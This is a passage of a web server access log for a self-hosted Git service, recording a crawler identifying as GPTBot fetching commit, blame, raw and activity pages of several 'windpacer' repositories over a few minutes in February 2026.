GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:17:44 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e.diff" -[17/Feb/2026:13:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 14807] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 20593] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" -[17/Feb/2026:13:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/code-frequency" [Client 74.7.227.38] [Length 7539] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/contributors" [Client 74.7.227.38] [Length 7617] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" -[17/Feb/2026:13:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" -[17/Feb/2026:13:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14296] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" -[17/Feb/2026:13:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" -[17/Feb/2026:13:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" -[17/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" -[17/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16913] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" -[17/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 12025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14960] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" -[17/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 11640] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" -[17/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" -[17/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" [Client 74.7.227.38] [Length 7491] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 10150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" -[17/Feb/2026:13:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=.gitignore" [Client 74.7.227.38] [Length 21493] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:13:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=nginx.conf" [Client 74.7.227.38] [Length 22357] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/packages" [Client 74.7.227.38] [Length 7408] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/watchers" [Client 74.7.227.38] [Length 7738] [Gzip 2.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" -[17/Feb/2026:13:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" -[17/Feb/2026:13:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" [Client 74.7.227.38] [Length 10139] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" -[17/Feb/2026:13:17:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" -[17/Feb/2026:13:17:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13870] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 26368] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15229] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 26354] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 26354] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15231] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:18:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15224] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8" -[17/Feb/2026:13:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13871] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" -[17/Feb/2026:13:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f" [Client 74.7.227.38] [Length 10421] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets" -[17/Feb/2026:13:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d.diff" [Client 74.7.227.38] [Length 2401552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" [Client 74.7.227.38] [Length 7489] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" -[17/Feb/2026:13:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13650] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" -[17/Feb/2026:13:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" -[17/Feb/2026:13:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 27433] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 11545] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/recent-commits" [Client 74.7.227.38] [Length 7527] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15231] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 9913] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" -[17/Feb/2026:13:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer.rss" [Client 74.7.227.38] [Length 7385] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" [Client 74.7.227.38] [Length 9838] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" [Client 74.7.227.38] [Length 10607] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" [Client 74.7.227.38] [Length 10797] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" [Client 74.7.227.38] [Length 10825] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" [Client 74.7.227.38] [Length 10798] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" -[17/Feb/2026:13:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fimages%2fdcsintegration.png" [Client 74.7.227.38] [Length 19134] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/yearly" [Client 74.7.227.38] [Length 8609] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/releases" [Client 74.7.227.38] [Length 7417] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr 